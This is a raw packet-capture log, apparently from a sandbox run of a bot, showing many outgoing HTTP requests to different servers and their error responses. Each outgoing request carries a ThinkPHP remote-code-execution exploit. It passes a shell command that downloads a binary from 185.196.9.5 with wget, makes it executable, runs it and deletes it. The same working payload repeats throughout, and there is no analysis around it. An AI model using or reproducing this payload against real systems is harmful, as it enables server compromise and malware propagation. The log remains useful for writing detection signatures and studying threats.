Feb 25, 2024 19:02:36.432909012 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:37.374528885 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.15	39322	88.99.210.141	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:36.526849985 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:36.711355925 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:02:36 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:02:36.711394072 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:02:36.711407900 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:02:36.711421013 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:02:36.711565018 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:02:36.711579084 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:02:36.711595058 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:02:36.711608887 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to corporate.galaxygate-hosting.com's <a href="mailto
Feb 25, 2024 19:02:36.711621046 CET	376	IN	Data Raw: 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 Data Ascii: nelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyr

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.15	56020	95.86.87.72	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:36.941339016 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.15	46112	112.214.239.215	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:37.449418068 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:38.950562954 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:39.240535021 CET	408	IN	HTTP/1.1 500 Internal Error content-length: 268 content-type:text/html connection:close cache-control:no-cache, no-store Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 35 30 30 20 69 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 3c 2f 68 31 3e 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3b 20 70 6c 65 61 73 65 20 77 61 69 74 20 61 20 77 68 69 6c 65 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 20 49 66 20 74 68 65 20 70 72 6f 62 6c 65 6d 20 70 65 72 73 69 73 74 73 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 75 70 70 6f 72 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 2e 3c 68 31 3e 20 41 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 3c 2f 68 31 3e 54 68 65 20 48 54 54 50 20 68 65 61 64 65 72 73 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 70 61 72 73 65 64 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>HTTP 500 internal server error</h1>An unexpected error occurred; please wait a while and try again. If the problem persists, please contact your support representative.<h1> Additional information </h1>The HTTP headers could not be parsed.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.15	60378	112.85.242.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:37.489007950 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:37.819499969 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:37 GMT Content-Type: text/html Content-Length: 2828 Connection: close x-ws-request-id: 65db80bd_PS-XUZ-01Tan52_29193-43891 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 32 35 20 46 65 62 20 32 30 32 34 20 31 38 3a 30 32 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 32 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 58 55 5a 2d 30 31 54 61 6e 35 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Sun, 25 Feb 2024 18:02:37 GMT<br><span class="F">IP: 89.149.18.20</span>Node information: PS-XUZ-01Tan52<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/
Feb 25, 2024 19:02:37.819547892 CET	1286	IN	Data Raw: 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 09 Data Ascii: x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 65db80bd_PS-XUZ-01Tan52_29193-43891<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class=
Feb 25, 2024 19:02:37.819560051 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Feb 25, 2024 19:02:37.928386927 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu
Feb 25, 2024 19:02:38.123712063 CET	456	IN	Data Raw: 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e 6f 74 Data Ascii: requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">fu

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.15	60376	112.85.242.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:37.490017891 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:37.821655989 CET	1286	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:02:37 GMT Content-Type: text/html Content-Length: 2828 Connection: close x-ws-request-id: 65db80bd_PS-XUZ-01Tan52_27777-23162 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 53 75 6e 2c 20 32 35 20 46 65 62 20 32 30 